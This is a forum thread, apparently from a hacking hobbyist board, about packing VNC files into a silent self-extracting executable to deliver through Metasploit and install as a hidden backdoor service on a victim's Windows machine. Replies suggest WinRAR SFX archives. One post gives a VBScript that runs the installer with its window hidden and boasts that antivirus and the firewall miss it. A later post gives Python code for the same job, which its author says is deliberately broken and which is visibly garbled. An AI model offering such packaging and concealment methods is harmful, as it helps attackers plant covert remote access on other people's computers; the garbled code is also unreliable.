Self Extract then Execute HELP!

[Deathray]

Hi people. I would be so grateful for help with my situation.

I have 4 files.

install.bat

VNCHOOKS.DLL

WINVNC.EXE

VNC.REG

Is there any way to combine these 4 files into a single, self extracting .exe file which executes install.bat silently?

The reason being is because I am using the windows/upexec payload in Metasploit and want to install VNC as a service silently when executed for use future backdoor use.

[gEEEk]

I think a WinRAR SFX archive might be what you're looking for.

It will compress and make all your files to a single executable which can run a file after the extraction.

[Deathray]

I think a WinRAR SFX archive might be what you're looking for.

It will compress and make all your files to a single executable which can run a file after the extraction.

Oh .. my... god! EXACTLY what I was looking for...

1 last problem - when the batch file gets executed the cmd.exe window pop's up - any way to hide that? Thanks in advance!! :):)

[Deathray]

Never mind I found a quick solution :)

Instead of 4 files I have 5 files. A new one called install.vbs

It contains this:

Set WshShell = CreateObject("WScript.Shell")

cmds=WshShell.RUN(".\install.bat", 0, True)

Set WshShell = Nothing

Now the batch file is completely invisible haha this is so cool :D Thanks you soooo much for your help :)

[freeb]

I'm sure Darren did a segment about something like this in a previous season.

[Deathray]

I'm sure Darren did a segment about something like this in a previous season.

A link would be great there are so many videos :P

[dr0p]

Start -> Run -> iexpress.exe

[Deathray]

Start -> Run -> iexpress.exe

Been there, done that. iexpress.exe has some limits in the way it works. Not going to explain why but basically it sucks :P

[Zimmer]

ya Darren did a segment

Darren builds a one-click remote assistance package to help save the holidays

link to episode page http://www.hak5.org/episodes/episode-3x05-release

mp4 file http://www.podtrac.com/pts/redirect.mp4?ht...-3x05--ipod.mp4

Enjoy!

[DingleBerries]

Nice try USBHACKER! lol no but you can do all of that in less than 20lines of python and still hide the cmd window. You have to many files running, its just to sloppy.

[Deathray]

Nice try USBHACKER! lol no but you can do all of that in less than 20lines of python and still hide the cmd window. You have to many files running, its just to sloppy.

lol yeah I did steal the batch + vnc from gonzors payload :D ... But I thought it was great because it installs itself as a service and no AntiVirus detect it as a virus plus windows firewall doesent seem to care VNC binding to a port :)

Yeah probably - but that would require me learning python first AND the victim would have to have python installed on his computer, which is not realistic and I want my lab to be realistic :).

Thanks Zimmer for the link. Hope you didn't use any more time than I would of if I looked for it by myself.

[DingleBerries]

Yeah probably - but that would require me learning python first AND the victim would have to have python installed on his computer,

Nope, just turn the python code into and executable and it will run under almost any windows system.

[Deathray]

Nope, just turn the python code into and executable and it will run under almost any windows system.

Wouldnt that be more sloppy as it would require the executable file to contain the entire python runtime?

[DingleBerries]

Wouldnt that be more sloppy as it would require the executable file to contain the entire python runtime?

Nope, as a matter of fact I am making an exe to do all this atm. I will post the link to it later.

Source:

VNC.exe

import os,
from ConfigParser import ConfigParser
config.read('vnc.cfg')
newpath = config.get('Move To', 'Location')
vncauth =  config.get('VNC Auth', 'Password')
if not os.path.isdir(newpath):
srcname = "winvnc.exe"
srcname = "hooks.dll"
shutil.copy(srcname, newpath)
shutil.copy(srcname1, newpath)
f = open("VNC.reg", 'r')
f.write('Windows Registry Editor Version 5.00\n[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC][HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4]\n')
f.write(vncauth)
f.write('REG SHIT')
f.close()
reg=os.popen3('VNC.reg','b')
runvnc=os.popen3(newpath + 'winvnc4.exe','b')

VNC.cfg

[Move To]
Location: C:\VNC
[VNC Auth]
Password: “Password”=hex:HEX COMMA SEPARATED PASS

Ask for permission to edit the registry but you get the idea. Less than 1MB and you can do pretty much what you want with it. Code is sloppy, missing shit and doesnt work on purpose.